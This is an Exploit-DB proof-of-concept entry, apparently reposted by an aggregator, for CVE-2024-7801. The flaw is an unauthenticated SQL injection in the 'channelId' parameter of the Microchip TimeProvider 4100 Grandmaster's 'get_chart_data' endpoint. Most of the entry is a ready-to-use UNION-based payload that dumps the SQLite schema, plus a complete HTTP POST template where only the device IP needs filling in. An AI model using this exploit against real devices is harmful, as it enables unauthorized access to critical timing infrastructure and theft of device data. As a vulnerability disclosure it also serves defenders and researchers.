[remote] Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection
Microchip TimeProvider 4100 Grandmaster设备固件存在未认证SQL注入漏洞(CVE-2024-7801),影响版本1.0至2.4.7。攻击者可通过"channelId"参数执行恶意SQL命令,获取敏感数据或控制设备。 2025-4-5 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:28 收藏
Microchip TimeProvider 4100 Grandmaster设备固件存在未认证SQL注入漏洞(CVE-2024-7801),影响版本1.0至2.4.7。攻击者可通过"channelId"参数执行恶意SQL命令,获取敏感数据或控制设备。 2025-4-5 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:28 收藏
# Exploit Title: Microchip TimeProvider 4100 Grandmaster - Unauthenticated SQL Injection
# Exploit Author: Armando Huesca Prida, Marco Negro
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Date of Disclosure: 27/06/2024
# Date of CVE Publication: 4/10/2024
# Exploit Publication: 11/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware release 1.0 through 2.4.7
# Tested on: Firmware release 2.3.12
# CVE: CVE-2024-7801
# External References:
# URL: https://www.cve.org/cverecord?id=CVE-2024-7801
# URL: https://www.0xhuesca.com/2024/10/cve-2024-7801.html
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection
# URL: https://www.gruppotim.it/it/footer/red-team.html
# Vulnerability Description:
The TimeProvider® 4100 Grandmaster firmware has a SQL injection vulnerability in the “get_chart_data” web resource, specifically the “channelId” parameter is inserted directly into the SQL query (SQLite) at the table's name query parameter from which the FROM operation is performed. Unauthenticated threat actors can manipulate queries to execute malicious SQL commands against the device.
# Example of Malicious SQL Payload:
SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--
# Proof of Concept - PoC:
By manually modifying the following request, it is possible to execute malicious SQL commands against the device. The list of values that must be updated in the exploit HTTP request is given below:
- [malicious SQL payload]
- [device IP]
# Exploit - HTTP Request:
POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=
1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1
# End
文章来源: https://www.exploit-db.com/exploits/52122
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh